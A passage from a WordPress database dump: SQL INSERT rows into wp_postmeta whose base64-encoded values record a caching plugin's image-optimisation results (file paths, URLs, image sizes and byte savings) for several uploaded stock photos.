CI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMjM4MTg1Mi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTM1LCJ0aW1lIjoxNDgzNTgwNjA1LCJpZCI6ODYzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMjM4MTg1Mi01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMjM4MTg1Mi01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMjM4MTg1Mi01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6OTE2LCJ0aW1lIjoxNDgzNTgwNjA5LCJpZCI6ODYzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIyMzgxODUyLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIyMzgxODUyLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIyMzgxODUyLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0NDMsInRpbWUiOjE0ODM1ODA2MTMsImlkIjo4NjN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjIzODE4NTItMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjIzODE4NTItMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjIzODE4NTItMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjUwNCwidGltZSI6MTQ4MzU4MDYxNiwiaWQiOjg2M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMjM4MTg1Mi0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMjM4MTg1Mi0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMjM4MTg1Mi0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NjYzLCJ0aW1lIjoxNDgzNTgwNjIwLCJpZCI6ODYzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIyMzgxODUyLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIyMzgxODUyLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIyMzgxODUyLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo3MTgsInRpbWUiOjE0ODM1ODA2MjMsImlkIjo4NjN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjIzODE4NTItNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjIzODE4NTItNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjIzODE4NTItNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjk3NCwidGltZSI6MTQ4MzU4MDYyNywiaWQiOjg2M31d'); 
INSERT INTO `wp_postmeta` VALUES (29928, 859, 'wpfc_optimisation_reduction', '9406'); 
INSERT INTO `wp_postmeta` VALUES (29929, 859, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM5NjU3Njk0MC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zOTY1NzY5NDAuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4MDYzMiwiaWQiOiI4NTkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zOTY1NzY5NDAtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzk2NTc2OTQwLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM5NjU3Njk0MC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NDk0LCJ0aW1lIjoxNDgzNTgwNjM1LCJpZCI6ODU5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zOTY1NzY5NDAtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzk2NTc2OTQwLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM5NjU3Njk0MC04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6Njk3LCJ0aW1lIjoxNDgzNTgwNjM5LCJpZCI6ODU5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zOTY1NzY5NDAtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzk2NTc2OTQwLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM5NjU3Njk0MC03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6Njg1LCJ0aW1lIjoxNDgzNTgwNjQzLCJpZCI6ODU5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zOTY1NzY5NDAtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM5NjU3Njk0MC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM5NjU3Njk0MC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoyNjU1LCJ0aW1lIjoxNDgzNTgwNjQ4LCJpZCI6ODU5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zOTY1NzY5NDAtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzk2NTc2OTQwLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM5NjU3Njk0MC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTAwLCJ0aW1lIjoxNDgzNTgwNjUyLCJpZCI6ODU5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zOTY1NzY5NDAtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzk2NTc2OTQwLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM5NjU3Njk0MC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDMzLCJ0aW1lIjoxNDgzNTgwNjU1LCJpZCI6ODU5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zOTY1NzY5NDAtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzk2NTc2OTQwLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM5NjU3Njk0MC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDUyLCJ0aW1lIjoxNDgzNTgwNjU4LCJpZCI6ODU5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zOTY1NzY5NDAtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzk2NTc2OTQwLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM5NjU3Njk0MC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6NjUxLCJ0aW1lIjoxNDgzNTgwNjYyLCJpZCI6ODU5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM5NjU3Njk0MC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zOTY1NzY5NDAtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzk2NTc2OTQwLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0NTUsInRpbWUiOjE0ODM1ODA2NjUsImlkIjo4NTl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzk2NTc2OTQwLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM5NjU3Njk0MC0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zOTY1NzY5NDAtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjQ5NywidGltZSI6MTQ4MzU4MDY2OSwiaWQiOjg1OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zOTY1NzY5NDAtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzk2NTc2OTQwLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM5NjU3Njk0MC0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTcxLCJ0aW1lIjoxNDgzNTgwNjcyLCJpZCI6ODU5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM5NjU3Njk0MC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zOTY1NzY5NDAtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzk2NTc2OTQwLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo2MzMsInRpbWUiOjE0ODM1ODA2NzYsImlkIjo4NTl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzk2NTc2OTQwLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM5NjU3Njk0MC00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zOTY1NzY5NDAtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjY4MywidGltZSI6MTQ4MzU4MDY3OSwiaWQiOjg1OX1d'); 
INSERT INTO `wp_postmeta` VALUES (29930, 851, 'wpfc_optimisation_reduction', '10397'); 
INSERT INTO `wp_postmeta` VALUES (29931, 851, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkyNzM5MTYwLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkyNzM5MTYwLmpwZyIsIndpZHRoIjo0Mjg4LCJoZWlnaHQiOjI4NDgsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1ODA2ODQsImlkIjoiODUxIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTI3MzkxNjAtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTI3MzkxNjAtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTI3MzkxNjAtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjYzMCwidGltZSI6MTQ4MzU4MDY4OCwiaWQiOjg1MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTI3MzkxNjAtODAweDUzMS5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTI3MzkxNjAtODAweDUzMS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTI3MzkxNjAtODAweDUzMS5qcGciLCJyZWR1Y3Rpb24iOjkyOSwidGltZSI6MTQ4MzU4MDY5MiwiaWQiOjg1MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTI3MzkxNjAtNzY4eDUxMC5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTI3MzkxNjAtNzY4eDUxMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTI3MzkxNjAtNzY4eDUxMC5qcGciLCJyZWR1Y3Rpb24iOjkyMCwidGltZSI6MTQ4MzU4MDY5NiwiaWQiOjg1MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTI3MzkxNjAtMTYwMHgxMDYzLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzkyNzM5MTYwLTE2MDB4MTA2My5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTI3MzkxNjAtMTYwMHgxMDYzLmpwZyIsInJlZHVjdGlvbiI6MjAxOCwidGltZSI6MTQ4MzU4MDcwMiwiaWQiOjg1MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTI3MzkxNjAtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTI3MzkxNjAtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTI3MzkxNjAtMjUweDI1MC